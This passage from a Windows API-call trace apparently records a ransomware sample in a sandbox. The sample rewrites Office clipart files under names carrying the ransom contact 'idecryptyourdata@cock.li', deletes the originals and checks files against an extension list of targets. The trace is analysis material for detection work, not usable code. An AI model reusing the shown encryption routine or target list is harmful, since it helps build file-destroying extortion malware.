lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.135] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200279.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200279.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0200.136] GetLastError () returned 0x0 [0200.136] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x4c0a, lpOverlapped=0x0) returned 1 [0200.198] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x4c10, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x4c10, lpOverlapped=0x0) returned 1 [0200.311] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0200.311] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0200.311] SetEndOfFile (hFile=0x39c) returned 1 [0200.311] CloseHandle (hObject=0x39c) returned 1 [0200.312] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.312] SetEndOfFile (hFile=0x38c) returned 1 [0200.313] CloseHandle (hObject=0x38c) returned 1 [0200.313] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200279.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.313] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200279.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200279.wmf")) returned 1 [0200.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200279.WMF") returned 68 [0200.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200279.WMF") returned 68 [0200.314] lstrlenW (lpString=".doc") returned 4 [0200.314] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.314] lstrlenW (lpString=".docx") returned 5 [0200.314] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0200.314] lstrlenW (lpString=".pdf") returned 4 [0200.314] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.314] lstrlenW (lpString=".xls") returned 4 [0200.314] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.314] lstrlenW (lpString=".xlsx") returned 5 [0200.314] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0200.314] lstrlenW (lpString=".ppt") returned 4 [0200.314] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200279.WMF") returned 68 [0200.314] lstrlenW (lpString=".zip") returned 4 [0200.314] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.314] lstrlenW (lpString=".rar") returned 4 [0200.314] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.314] lstrlenW (lpString=".bz2") returned 4 [0200.315] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.315] lstrlenW (lpString=".7z") returned 3 [0200.315] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200279.WMF") returned 68 [0200.315] lstrlenW (lpString=".dbf") returned 4 [0200.315] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200279.WMF") returned 68 [0200.315] lstrlenW (lpString=".1cd") returned 4 [0200.315] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200279.WMF") returned 68 [0200.315] lstrlenW (lpString=".jpg") returned 4 [0200.315] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.316] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.316] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.316] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200467.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200467.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0200.317] GetLastError () returned 0x0 [0200.317] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x366e, lpOverlapped=0x0) returned 1 [0200.332] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x3670, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x3670, lpOverlapped=0x0) returned 1 [0200.334] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0200.334] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0200.334] SetEndOfFile (hFile=0x39c) returned 1 [0200.334] CloseHandle (hObject=0x39c) returned 1 [0200.334] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.334] SetEndOfFile (hFile=0x38c) returned 1 [0200.335] CloseHandle (hObject=0x38c) returned 1 [0200.335] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200467.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.335] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200467.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200467.wmf")) returned 1 [0200.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200467.WMF") returned 68 [0200.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200467.WMF") returned 68 [0200.336] lstrlenW (lpString=".doc") returned 4 [0200.336] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.336] lstrlenW (lpString=".docx") returned 5 [0200.336] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0200.336] lstrlenW (lpString=".pdf") returned 4 [0200.336] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.336] lstrlenW (lpString=".xls") returned 4 [0200.336] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.336] lstrlenW (lpString=".xlsx") returned 5 [0200.336] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0200.336] lstrlenW (lpString=".ppt") returned 4 [0200.336] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200467.WMF") returned 68 [0200.337] lstrlenW (lpString=".zip") returned 4 [0200.337] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.337] lstrlenW (lpString=".rar") returned 4 [0200.337] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.337] lstrlenW (lpString=".bz2") returned 4 [0200.337] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.337] lstrlenW (lpString=".7z") returned 3 [0200.337] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200467.WMF") returned 68 [0200.337] lstrlenW (lpString=".dbf") returned 4 [0200.337] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200467.WMF") returned 68 [0200.337] lstrlenW (lpString=".1cd") returned 4 [0200.337] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200467.WMF") returned 68 [0200.337] lstrlenW (lpString=".jpg") returned 4 [0200.337] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.338] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.338] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.338] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0202045.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0202045.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0200.339] GetLastError () returned 0x0 [0200.339] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0xa50e, lpOverlapped=0x0) returned 1 [0200.395] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xa510, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xa510, lpOverlapped=0x0) returned 1 [0200.397] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0200.397] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0200.397] SetEndOfFile (hFile=0x39c) returned 1 [0200.397] CloseHandle (hObject=0x39c) returned 1 [0200.398] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.398] SetEndOfFile (hFile=0x38c) returned 1 [0200.399] CloseHandle (hObject=0x38c) returned 1 [0200.399] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0202045.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.400] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0202045.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0202045.jpg")) returned 1 [0200.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0202045.JPG") returned 68 [0200.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0202045.JPG") returned 68 [0200.401] lstrlenW (lpString=".doc") returned 4 [0200.401] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0200.401] lstrlenW (lpString=".docx") returned 5 [0200.401] lstrcmpiW (lpString1=".docx", lpString2="5.JPG") returned -1 [0200.401] lstrlenW (lpString=".pdf") returned 4 [0200.401] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0200.401] lstrlenW (lpString=".xls") returned 4 [0200.401] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0200.401] lstrlenW (lpString=".xlsx") returned 5 [0200.401] lstrcmpiW (lpString1=".xlsx", lpString2="5.JPG") returned -1 [0200.401] lstrlenW (lpString=".ppt") returned 4 [0200.401] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0200.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0202045.JPG") returned 68 [0200.401] lstrlenW (lpString=".zip") returned 4 [0200.401] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0200.401] lstrlenW (lpString=".rar") returned 4 [0200.401] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0200.401] lstrlenW (lpString=".bz2") returned 4 [0200.401] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0200.401] lstrlenW (lpString=".7z") returned 3 [0200.401] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0200.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0202045.JPG") returned 68 [0200.402] lstrlenW (lpString=".dbf") returned 4 [0200.402] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0200.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0202045.JPG") returned 68 [0200.402] lstrlenW (lpString=".1cd") returned 4 [0200.402] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0200.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0202045.JPG") returned 68 [0200.402] lstrlenW (lpString=".jpg") returned 4 [0200.402] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0200.402] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.402] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.402] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212685.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212685.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0200.403] GetLastError () returned 0x0 [0200.403] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x199a, lpOverlapped=0x0) returned 1 [0200.630] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x19a0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x19a0, lpOverlapped=0x0) returned 1 [0200.631] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0200.631] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0200.632] SetEndOfFile (hFile=0x39c) returned 1 [0200.632] CloseHandle (hObject=0x39c) returned 1 [0200.632] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.632] SetEndOfFile (hFile=0x38c) returned 1 [0200.633] CloseHandle (hObject=0x38c) returned 1 [0200.633] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212685.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.633] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212685.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212685.wmf")) returned 1 [0200.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212685.WMF") returned 68 [0200.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212685.WMF") returned 68 [0200.634] lstrlenW (lpString=".doc") returned 4 [0200.634] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.634] lstrlenW (lpString=".docx") returned 5 [0200.634] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0200.634] lstrlenW (lpString=".pdf") returned 4 [0200.634] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.634] lstrlenW (lpString=".xls") returned 4 [0200.634] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.634] lstrlenW (lpString=".xlsx") returned 5 [0200.634] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1 [0200.634] lstrlenW (lpString=".ppt") returned 4 [0200.634] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212685.WMF") returned 68 [0200.635] lstrlenW (lpString=".zip") returned 4 [0200.635] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.635] lstrlenW (lpString=".rar") returned 4 [0200.635] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.635] lstrlenW (lpString=".bz2") returned 4 [0200.635] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.635] lstrlenW (lpString=".7z") returned 3 [0200.635] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212685.WMF") returned 68 [0200.635] lstrlenW (lpString=".dbf") returned 4 [0200.635] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212685.WMF") returned 68 [0200.635] lstrlenW (lpString=".1cd") returned 4 [0200.635] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212685.WMF") returned 68 [0200.635] lstrlenW (lpString=".jpg") returned 4 [0200.635] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.635] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.636] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.636] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215076.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215076.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0200.636] GetLastError () returned 0x0 [0200.636] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x1f50, lpOverlapped=0x0) returned 1 [0200.666] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x1f60, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x1f60, lpOverlapped=0x0) returned 1 [0200.667] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0200.667] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0200.667] SetEndOfFile (hFile=0x39c) returned 1 [0200.667] CloseHandle (hObject=0x39c) returned 1 [0200.667] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.667] SetEndOfFile (hFile=0x38c) returned 1 [0200.668] CloseHandle (hObject=0x38c) returned 1 [0200.668] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215076.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.669] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215076.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215076.wmf")) returned 1 [0200.669] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215076.WMF") returned 68 [0200.669] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215076.WMF") returned 68 [0200.670] lstrlenW (lpString=".doc") returned 4 [0200.670] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.670] lstrlenW (lpString=".docx") returned 5 [0200.670] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0200.670] lstrlenW (lpString=".pdf") returned 4 [0200.670] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.670] lstrlenW (lpString=".xls") returned 4 [0200.670] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.670] lstrlenW (lpString=".xlsx") returned 5 [0200.670] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0200.670] lstrlenW (lpString=".ppt") returned 4 [0200.670] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215076.WMF") returned 68 [0200.670] lstrlenW (lpString=".zip") returned 4 [0200.670] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.670] lstrlenW (lpString=".rar") returned 4 [0200.670] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.670] lstrlenW (lpString=".bz2") returned 4 [0200.670] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.670] lstrlenW (lpString=".7z") returned 3 [0200.670] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215076.WMF") returned 68 [0200.670] lstrlenW (lpString=".dbf") returned 4 [0200.670] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215076.WMF") returned 68 [0200.670] lstrlenW (lpString=".1cd") returned 4 [0200.670] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215076.WMF") returned 68 [0200.670] lstrlenW (lpString=".jpg") returned 4 [0200.671] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.671] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.671] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.671] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215710.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215710.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0200.672] GetLastError () returned 0x0 [0200.672] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x45a2, lpOverlapped=0x0) returned 1 [0200.684] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x45b0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x45b0, lpOverlapped=0x0) returned 1 [0200.686] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0200.686] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0200.686] SetEndOfFile (hFile=0x39c) returned 1 [0200.686] CloseHandle (hObject=0x39c) returned 1 [0200.686] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.686] SetEndOfFile (hFile=0x38c) returned 1 [0200.687] CloseHandle (hObject=0x38c) returned 1 [0200.687] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft 